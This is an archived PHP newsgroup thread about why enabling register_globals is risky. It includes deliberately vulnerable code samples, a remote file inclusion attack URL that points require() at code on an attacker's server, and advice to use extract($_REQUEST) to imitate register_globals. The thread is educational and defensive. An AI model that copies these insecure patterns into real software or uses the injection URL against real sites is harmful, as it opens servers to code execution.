Question about register_globals in php.ini

Hi all,
I have installed a web-based software written in php which needs
that I should turn "register_globals" from off to on in the php.ini.

There are some comments for register_globals in php.ini saying: "You
should do your best to write your scripts so that they do not require
register_globals to be on; Using form variables as globals can easily
lead to possible security problems, if the code is not very well thought
of."

Since there are other php programs running on the same server, I do
care about these comments very much.

Can someone give me some hints what is this *possible* security
problem if I turn the register_globals "on"? And what should I pay
attention to when writing my own php program on a "register_globals on"
server to avoid some attack?
Thanks in advance!

Lian
Jul 17 '05 #1
lian wrote:
> I have installed a web-based software written in php which needs
> that I should turn "register_globals" from off to on in the php.ini.

You probably can do that in a .htaccess file (in the directory that
software is put to) instead of changing the global php.ini.

> Can someone give me some hints what is this *possible* security
> problem if I turn the register_globals "on"? And what should I pay
> attention to when writing my own php program on a "register_globals on"
> server to avoid some attack?

Initialize *all* variables and register_globals no longer has any
security impact for your code.

Setting errorlevel to include notices (about using uninitialized
variables) is also a Good Thing.

Suppose you have a form that sends a username and password to the server
for validation. Bad (exploitable) code relying on register_globals could
then be:

<?php /* bad code: DO NOT DUPLICATE */
/* $username and $password have been automatically created */
/* because register_globals is on */
if (($username == 'admin') && ($password == 'SeCReT')) {
    $admin = true;
}

/* no initialization for $admin */
/* also relies on the fact that the first use of a variable */
/* sets it to 0 or false (after issuing a notice that is */
/* usually ignored) */
if ($admin) {
    /* do admin stuff */
}
?>

When some hacker changes the form (or URL) to also send the 'admin'
value, he'll get access to the admin stuff without knowing the
password.
By just inserting

$admin = false;

before any use of the variable (like the beginning of the script) you
avoid that security risk.

<?php
error_reporting(E_ALL);
ini_set('display_errors', '1');
$admin = false; /* initialize $admin */

/* $username and $password have been automatically created */
/* because register_globals is on */
if (($username == 'admin') && ($password == 'SeCReT')) {
    $admin = true;
}

/* initialization done for $admin */
if ($admin) {
    /* do admin stuff */
}
?>
--
Mail to my "From:" address is readable by all at http://www.dodgeit.com/
== ** ## !! ------------------------------------------------ !! ## ** ==
TEXT-ONLY mail to the whole "Reply-To:" address ("My Name" <my@address>)
may bypass my spam filter. If it does, I may reply from another address!
Jul 17 '05 #2
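
The login check from the post above, run side by side with its fix, as an added example that is not part of the original thread. register_globals no longer exists in current PHP, so `extract()` on a constructed request array stands in for it; the function names are hypothetical, and the third variant (no import at all, with a type check) goes one step beyond what the post shows.

```php
<?php
declare(strict_types=1);

// Added example, not code from the thread. register_globals was removed in
// PHP 5.4, so extract() on a constructed request array stands in for it.
// All function names below are hypothetical.

/** Pattern from the post: $admin is only ever assigned on success. */
function is_admin_uninitialised(array $request): bool
{
    extract($request);                    // request keys become local variables
    if (($username ?? '') === 'admin' && ($password ?? '') === 'SeCReT') {
        $admin = true;
    }
    return !empty($admin);                // a request key named "admin" decides
}

/** Fix from the post: initialise the flag after the import, before any use. */
function is_admin_initialised(array $request): bool
{
    extract($request);
    $admin = false;
    if (($username ?? '') === 'admin' && ($password ?? '') === 'SeCReT') {
        $admin = true;
    }
    return $admin;
}

/** No import at all: read only the named keys and check their type. */
function is_admin_explicit(array $request): bool
{
    $username = $request['username'] ?? '';
    $password = $request['password'] ?? '';
    if (!is_string($username) || !is_string($password)) {
        return false;                     // e.g. password[]=x arrives as an array
    }
    return $username === 'admin' && hash_equals('SeCReT', $password);
}

// Constructed sample requests.
$requests = [
    'valid login'     => ['username' => 'admin', 'password' => 'SeCReT'],
    'wrong password'  => ['username' => 'admin', 'password' => 'guess'],
    'extra admin key' => ['username' => 'guest', 'password' => 'x', 'admin' => '1'],
    'array password'  => ['username' => 'admin', 'password' => ['SeCReT']],
];

foreach ($requests as $label => $request) {
    printf(
        "%-16s uninitialised=%-5s initialised=%-5s explicit=%s\n",
        $label,
        var_export(is_admin_uninitialised($request), true),
        var_export(is_admin_initialised($request), true),
        var_export(is_admin_explicit($request), true)
    );
}
```

Only the "extra admin key" row differs between the first two columns: the uninitialised version reports true there, the other two report false.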
"Pedro Graca" <he****@dodgeit .com> wrote in message
news:sl*******************@ID-203069.user.uni-berlin.de...
> lian wrote:
> > I have installed a web-based software written in php which needs
> > that I should turn "register_globals" from off to on in the php.ini.
>
> You probably can do that in a .htaccess file (in the directory that
> software is put to) instead of changing the global php.ini.
>
> > Can someone give me some hints what is this *possible* security
> > problem if I turn the register_globals "on"? And what should I pay
> > attention to when writing my own php program on a "register_globals on"
> > server to avoid some attack?
>
> Initialize *all* variables and register_globals no longer has any
> security impact for your code.

That statement is a little misleading. Yes, register_globals would not
compromise your system if all global variables are initialized. Initializing
all global variables does not guarantee that would happen, however. If you
do not fully control your execution path, then your initialization code
could be bypassed.

This brings us back to the "why single entry point systems suck" discussion.
If the initialization of globals happens at the designated entry point, and
there exist in the application other unintended entry points (a very common
mistake), then register_globals becomes extremely dangerous. The example
below demonstrates the prototypical register_globals vulnerability.

In web application X, all pages are accessed through controller.php. This
script looks at a GET variable to determine which page to display.
Configuration information is stored in a file called config.php.

config.php:
<?php
$CLASS_PATH = "/usr/lib/scripting/php/classes";
$DB_USER = "satan";
$DB_NAME = "hell";
/* other variables */
?>

controller.php:
<?php

require("config.php");
require("header.php");

switch($_GET['section']) {
    case 'forum': require("forum.php"); break;
    case 'about': require("about.php"); break;
    /* other pages */
    default: require("main.php");
}

require("footer.php");

?>

forum.php:
<?php

/* $CLASS_PATH is expected to come from config.php via controller.php */
require("$CLASS_PATH/UI.View.Message.php");
require("$CLASS_PATH/UI.View.MessageThread.php");
require("$CLASS_PATH/UI.Widget.HTMLEditor.php");

/* do stuff */

?>

The vulnerability is in forum.php. Even though controller.php is the page
that people are supposed to go through, nothing stops them from accessing
forum.php directly, in which case $CLASS_PATH is no longer initialized. And
as you know, require() can read files from a remote source. So an attacker
can inject arbitrary PHP code into the script with this URL:

http://www.hell.uz/forum.php?CLASS_P...666.28/dk.txt?

where dk.txt, sitting on the attacker's server, holds the malicious code.

The real design flaw here is allowing remote require/include. Instead of
fixing that the PHP team decided to banish register_globals. Oh well.

Jul 17 '05 #3
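
A hardened shape for the forum.php include described in the post above, as an added example that is not part of the original thread. It assumes a guard constant `APP_ENTRY` set by controller.php, a `CLASS_PATH` constant in place of the `$CLASS_PATH` variable, and a helper `class_file()`; all three names are hypothetical, and the class directory is a constructed sandbox so the script runs on its own.

```php
<?php
declare(strict_types=1);

// Added example, not code from the thread. APP_ENTRY, CLASS_PATH and
// class_file() are hypothetical names; the directory is a constructed sandbox.

// --- what controller.php / config.php would do -----------------------------
$sandbox = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'rg_demo_' . getmypid();
mkdir($sandbox . DIRECTORY_SEPARATOR . 'classes', 0700, true);
$stub = $sandbox . DIRECTORY_SEPARATOR . 'classes' . DIRECTORY_SEPARATOR . 'UI.View.Message.php';
file_put_contents($stub, "<?php /* constructed stub */\n");

// Constants are not populated from GET/POST/cookies, so a request parameter
// named CLASS_PATH cannot replace this value the way it replaced $CLASS_PATH.
define('CLASS_PATH', realpath($sandbox . DIRECTORY_SEPARATOR . 'classes'));
define('APP_ENTRY', true);

// --- what forum.php would start with ---------------------------------------
if (!defined('APP_ENTRY')) {              // requested directly, not via controller
    http_response_code(403);
    exit('Forbidden');
}

/** Resolve an include name to a real file inside CLASS_PATH, or throw. */
function class_file(string $name): string
{
    // Plain file names only: no slashes, so no traversal and no scheme://host.
    if (preg_match('/\A[A-Za-z0-9_.]+\.php\z/', $name) !== 1) {
        throw new InvalidArgumentException("rejected include name: $name");
    }
    $path = realpath(CLASS_PATH . DIRECTORY_SEPARATOR . $name);
    $base = CLASS_PATH . DIRECTORY_SEPARATOR;
    if ($path === false || strncmp($path, $base, strlen($base)) !== 0) {
        throw new RuntimeException("not a file under CLASS_PATH: $name");
    }
    return $path;
}

// Constructed inputs: one legitimate name and two that must be refused.
foreach (['UI.View.Message.php', '../config.php', 'http://remote.invalid/x.txt'] as $name) {
    try {
        require_once class_file($name);
        echo "included  $name\n";
    } catch (InvalidArgumentException | RuntimeException $e) {
        echo 'refused   ', $e->getMessage(), "\n";
    }
}

// allow_url_include (php.ini, introduced in PHP 5.2, Off by default) is the
// server-side switch that stops include/require from following URL wrappers.
echo 'allow_url_include = ', var_export(ini_get('allow_url_include'), true), "\n";

unlink($stub);
rmdir($sandbox . DIRECTORY_SEPARATOR . 'classes');
rmdir($sandbox);
```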
Chung Leong <ch***********@hotmail.com> wrote:
[snip]
> The vulnerability is in forum.php. Even though controller.php is the page
> that people are supposed to go through, nothing stops them from accessing
> forum.php directly, in which case $CLASS_PATH is no longer initialized. And
> as you know, require() can read files from a remote source. So an attacker
> can inject arbitrary PHP code into the script with this URL:
>
> http://www.hell.uz/forum.php?CLASS_P...666.28/dk.txt?
>
> where dk.txt, sitting on the attacker's server, holds the malicious code.
>
> The real design flaw here is allowing remote require/include.

And the real _design_ flaw in the snipped code is that files that are
only intended for include()s can be directly called by a client. They
should be stored somewhere outside the "documentroot" or similar
solutions.

Jul 17 '05 #4
"lian" <np***@ming.com > wrote in message
news:32*************@individual.net...
> Hi all,
> I have installed a web-based software written in php which needs
> that I should turn "register_globals" from off to on in the php.ini.
>
> There are some comments for register_globals in php.ini saying: "You
> should do your best to write your scripts so that they do not require
> register_globals to be on; Using form variables as globals can easily
> lead to possible security problems, if the code is not very well thought
> of."
>
> Since there are other php programs running on the same server, I do
> care about these comments very much.
>
> Can someone give me some hints what is this *possible* security
> problem if I turn the register_globals "on"? And what should I pay
> attention to when writing my own php program on a "register_globals on"
> server to avoid some attack?
> Thanks in advance!
>
> Lian

See if the application uses a globally included file. If it does, then add
the following lines at the top to simulate register_globals:

extract($_REQUEST);
extract($_ENV);
extract($_SERVER);

If it doesn't, it's also not that hard to add them to every file :-)

I would advise against turning on register_globals if you're using other PHP
apps. If they're popular packages and they're not secured in a
register_globals on environment, then chances are there're automated attacks
exploiting any vulnerability. The next thing you know your server will be
spewing out gigabytes of spam. As for this application itself, if it uses a
single entry point system, then don't use it. Read my other message for an
explanation.
Jul 17 '05 #5
.oO(Chung Leong)

> The vulnerability is in forum.php. Even though controller.php is the page
> that people are supposed to go through, nothing stops them from accessing
> forum.php directly,

Not PHP's fault.

> in which case $CLASS_PATH is no longer initialized. And
> as you know, require() can read files from a remote source.

If enabled.

> So an attacker
> can inject arbitrary PHP code into the script with this URL:
>
> http://www.hell.uz/forum.php?CLASS_P...666.28/dk.txt?
>
> where dk.txt, sitting on the attacker's server, holds the malicious code.
>
> The real design flaw here is allowing remote require/include. Instead of
> fixing that the PHP team decided to banish register_globals. Oh well.


The problem is not the remote execution, but simply the programmer's
mistake. If you want to have a single-entry application then you have to
make sure that there are definitely no other entry points. In your
example the forum.php should not be accessible with an URL. If it is
then you have to live with the consequences.

PHP just offers the tools, whether you build something useful or a time
bomb with it is up to you.

Micha
Jul 17 '05 #6
"Michael Fesser" <ne*****@gmx.ne t> wrote in message
news:rs********************************@4ax.com...
> .oO(Chung Leong)
>
> > The vulnerability is in forum.php. Even though controller.php is the page
> > that people are supposed to go through, nothing stops them from accessing
> > forum.php directly,
>
> Not PHP's fault.

I'm not saying it is.

> > in which case $CLASS_PATH is no longer initialized. And
> > as you know, require() can read files from a remote source.
>
> If enabled.

As far as I know there's no way to disable remote file access for require()
and include() only. In most PHP setups therefore it is enabled, as
file("http://...") is such a common operation.

Security of an application shouldn't be reliant on server setup anyway. It
should be built into the code.

> > So an attacker
> > can inject arbitrary PHP code into the script with this URL:
> >
> > http://www.hell.uz/forum.php?CLASS_P...666.28/dk.txt?
> >
> > where dk.txt, sitting on the attacker's server, holds the malicious code.
> >
> > The real design flaw here is allowing remote require/include. Instead of
> > fixing that the PHP team decided to banish register_globals. Oh well.
>
> The problem is not the remote execution, but simply the programmer's
> mistake. If you want to have a single-entry application then you have to
> make sure that there are definitely no other entry points. In your
> example the forum.php should not be accessible with an URL. If it is
> then you have to live with the consequences.

The mistake is using a single-entry point system. Or to be more specific,
the mistake is executing code in the global scope in files that are not
meant to be accessed. If your include files contain only function and class
definitions, then you wouldn't have a problem even if they reside in a web
accessible directory.

> PHP just offers the tools, whether you build something useful or a time
> bomb with it is up to you.

Outlook is also just a tool.
Jul 17 '05 #7
.oO(Chung Leong)

> > The problem is not the remote execution, but simply the programmer's
> > mistake. If you want to have a single-entry application then you have to
> > make sure that there are definitely no other entry points. In your
> > example the forum.php should not be accessible with an URL. If it is
> > then you have to live with the consequences.
>
> The mistake is using a single-entry point system.

I don't consider that a real problem if done properly (even if I don't
like it).

> Or to be more specific,
> the mistake is executing code in the global scope in files that are not
> meant to be accessed. If your include files contain only function and class
> definitions, then you wouldn't have a problem even if they reside in a web
> accessible directory.

OK, but why would you want to have files in a web accessible directory
that are not meant for direct access? If I don't want people accessing
certain files then I simply don't provide that possibility.

> > PHP just offers the tools, whether you build something useful or a time
> > bomb with it is up to you.
>
> Outlook is also just a tool.

Yep, for spreading viruses. SCNR ;)

Micha
Jul 17 '05 #8
Michael Fesser wrote:
> .oO(Chung Leong)
>
> > Or to be more specific,
> > the mistake is executing code in the global scope in files that are not
> > meant to be accessed. If your include files contain only function and class
> > definitions, then you wouldn't have a problem even if they reside in a web
> > accessible directory.
>
> OK, but why would you want to have files in a web accessible directory
> that are not meant for direct access? If I don't want people accessing
> certain files then I simply don't provide that possibility.


A legitimate reason is that you're distributing the scripts as an
archive that's runnable in-place after extraction.

People installing the software might or might not _have_ a usable area
outside their web root, and if they do it will require extra work to set
it up. Putting include files into a subdirectory is easier to get
working out of the box (and thus reduces the support burden from
third-party users), but you may not be able to guarantee that it's
sealed off from access.

As a precaution, you can toss in a default .htaccess file which will
block off the directory on some Apache configurations, but not all
configurations will allow it.

-- brion vibber (brion @ pobox.com)
Jul 17 '05 #9
